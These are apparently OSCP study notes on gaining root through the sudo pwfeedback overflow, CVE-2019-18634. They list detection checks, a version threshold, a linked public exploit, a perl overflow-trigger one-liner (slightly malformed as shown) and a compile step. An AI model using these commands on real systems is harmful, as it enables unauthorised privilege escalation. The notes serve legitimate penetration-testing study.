// notes/ PrivEsc — Linux
🐧

Sudo CVE 2019 18634 Pwfeedback

Notes from oscp.adot8.com — linux privilege escalation.

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/sudo_cve-2019-18634-pwfeedback

CVE-2019-18634 (pwfeedback)

code
01sudo su root
02su root

If you see * when typing in a password, that is the pwfeedback environment variable being enabled and indicates that machine may be vulnerable

code
01sudo -V

Any Sudo version older than 1.8.26 is vulnerable

{% embed url="https://github.com/saleemrashid/sudo-cve-2019-18634" %}

code
01perl -e 'print(("A" x 100 . "\x{00}" x 50)' | sudo -S i
<figure><img src="/files/RWlUJ0TJ4yOWG5sfLg68" alt=""><figcaption></figcaption></figure>

Compile exploit, upload and run

code
01gcc -o bof exploit.c